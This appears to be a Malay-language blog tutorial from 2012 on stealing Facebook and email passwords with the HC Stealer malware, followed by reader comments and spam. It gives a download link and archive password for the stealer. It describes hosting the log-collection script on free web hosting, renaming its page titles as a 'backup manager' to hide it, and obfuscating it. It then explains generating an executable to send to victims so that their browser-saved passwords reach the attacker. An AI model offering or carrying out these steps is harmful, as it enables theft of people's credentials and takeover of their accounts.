Breaking News
Loading...
Thursday, June 21, 2012

Hack Facebook Mengunakan HC stealer

Sebelum korang baca semua nihh korang kena ada asas sikit dalam bidang html,php and database or mysql sebab tutorial aku nih ada part yang aku skip so korang pikir sendiri la...aku bukan tak mo bagi tutorial penuh tapi oleh kerana kawasan tempat aku belajar nihh line maxis,celcom,digi,yes,P1,streamxy dan semua jenis connection internet agak slow so aku susah nak upload gambar cari link software harap korang boleh la ikut ye..

Assalammualaikum kepada semua pembaca setia blog ini mungkin aku dah lama x update blog nih..oleh sebab-sebab tertentu seperti korang semua just masuk and x clik iklan aku so aku hilang semangat nak buat blog nihh hahhaha...tapi sebab terlalu ramai orang dalam aku punya fanpage yang duk tanya aku macam mana cara nak hack facebook so hari ini aku bagi kat korang satu g tips dan trik cara untuk korang hack facebook atau apa saja email and password menggunakan HC stealer kalau sebelum nih aku ajar korang cara nak hack facebook guna phishing dengan i stealer tapi sekarang nih i stealer telah di anggap sebagai virus so susah la korang untuk curi data so hari aku ajar korang guna HC stealer yang antivirus x kenal dia sebagai virus malware so korang just follow simple step yang akan aku ajar nih




apa yang korang perlukan untuk hack facebook atau semua jenis email and password 
     1)account 000webhosting
     2)download HC stealer
     3)Upload file index.php in server 000webhosting




so kita mulakan tutorian dengan download software HC stealer


Download HC Stealer
password! villavon
I am posting the download link because even I told everyone that please don't PM for this but I continuously receives PMs from members. That is why. So you can download HC Stealer from:
http://www.mediafire.com/?zp6w0khtfmm5gwa

2) Register
Account In 000webhost.com
http://www.000webhost.com/order.php for sign-up! 
click untuk gambar besar

Lepas dah register makesure korang buka email untuk comfirmation:

bila dah siap korang login pastuh korang click cpanel seperti gambar dibawah


lepas tuh korang buat database untuk simpan data cara nak buat senang je korang hanya clik Mysql masukkan nama apa yang korang nak dan password pastu korang tekan create database mcm gambar dibawah


























lepas korang dah tekan create database korang akan nampak mcm gambar dibawah ini make sure korang save page nih or bookmark sebab jap g kita nak guna information nihh





oke sekarang korang dah selesai  register 000webhosting and database so sekarang nih masa untuk korang buka file Hc stealer yang korang download tadi cari file nama index.php dengan style.css


lepas tuh korang open index.php guna notepad seperti gambar dibawah



korang cari code:  $html = "<html><head><title>HC Stealer 2.0.1 Log manager - "; nihh dalam index.php tuhh 
gantikan dengan code :    $html = "<html><head><title>My Personal Software manager - ";

lepas tuh korang cari plak code nihh : $footer = "<div id='footer'>HC Stealer by The 7th Sage 2011</div></div></body></html>";

Ganti dengan code nihh:$footer = "<div id='footer'>Backup manager - Backup Script 2011</div></div></body></html>"; 
lepas tuh korang tekan save,





pastuh bukan balik file yang korang save tadi korang isi semua maklumat yang aku suruh korang bookmark tuhh dalam seperti yang tertulis di gambar di atas


lepas tuh korang save dia.ok settel index.php






lepas dah habis korang cari kat google dan install " TrueBug PHP Obfuscator"


lepas dah install just follow step mudah dalam gambar dibawah





lepas korang dan siap buat benda dia akan create satu folder yang nama HC Stealer dekat destop kadang2 dia duk kat laen ikut korang punya setting pastu korang mesti pastikan korang upload file index.php yang baru nihh bukan yang original tadi kalau korang silap yang nih maka x jadilah korang punya pencuri.


Lepas dah siap nih korang pergi ke 000webhosting pastuh korang masuk kat dalam public_html pastuh upload kat file index.php yang ada dekat destop tadi upload dalam public_html,pastuh korang upload plak style.css lepas dah selesai korang copy link untuk index.php


buat benda nihh tekan kan chmod ada kat sebelah tepi





buka Hcstealer yang dah korang install







lepastuh korang masukkan link korang punya index.php
tekan jenerate lepas tuh siaplah korang punya pencuri dia tersimpan dalam OUTPUT folder dalam HCstealer

pastuh cuba la hantar korang punya pencuri nih kat mana2 orang and kalau orang tuh clik pencuri nih semua password yang diorang save dalam webbrowser dengan email akan masuk dekat link korang index.php korang just masukkan username degan password untuk tgok email dan password pencuri anda berjaya menjuri



















  

13 comments:

Anonymous said...

kenapa dia minta pasword la masa nak dwnload?

Anonymous said...

beb aku tak paham aaa, kita nak anta mana satu kat output tu? yg nak bg dorg klik tu? erhh pening aku. aku dah siap buat dah ni, cuma pening nak guna mcm mana, explain please

abdul maLek said...

benda yang kita keluarkan tuhh kita buat guna hc stealer t kalau aku free aku update full dengan penerangan yang mudah sikit...

mintak password masukkan password:villavon

Anonymous said...

x fham ayat ni ''lepastuh korang masukkan link korang punya index.php'' dekat mna link index.php tu??..dekat dlm kotak public tu ke or copy je link kt atas tu yg kt tmpat search??

Anonymous said...

x brape fhm ayt ni''lepastuh korang masukkan link korang punya index.php'' dkt mna link index tu?? dekat dlm kotak public html tu ke?? atau copy ke link kt tmpat search atas tu??

abdul maLek said...

copy link yang dekat search tuhh pastu tekan test

Anonymous said...

gxdtksrra
http://slyp.in/143 ヴィトン ダミエ
http://url.jc21.com/22 prada 財布
http://sted.me/j2 ヴィトン ダミエ
http://pulz.it/6o ヴィトン モノグラム
http://nr-1.dk/14ob グッチ メンズ

bbmiessia
グッチ 財布
ヴィトン 財布
ルイビトン
プラダ 財布
グッチ 財布

Anonymous said...

nk tnya bole..

cmna nk download "TrueBug PHP Obfuscator" aq da download tp bkn cmni .....please bg link download TrueBug PHP Obfuscator . . tq

Anonymous said...

tunjuk kan cara nak guna truebug php obfuscator 2.0 ..

Anonymous said...

sapa nak truebug boleh PM aku kat facebook
ahmadshakir41.com

Anonymous said...

Keep up the excellent piece of work, I read few content
on this web site and I conceive that your blog
is rattling interesting and has sets of wonderful information.


Also visit my homepage - adfly bot

Anonymous said...

As the admin of this website is working, no doubt very shortly it
will be well-known, due to its quality contents.

Look into my web-site ... youtube hits

Anonymous said...

A motivating discussion is worth comment. I do believe
that you should write more about this subject, it might not be a taboo subject but generally folks don't discuss such topics. To the next! All the best!!

Also visit my web page ... Car Town Facebookworking car town cheats

Quick Message
Press Esc to close
Copyright © 2013 sAmpan KErTas All Right Reserved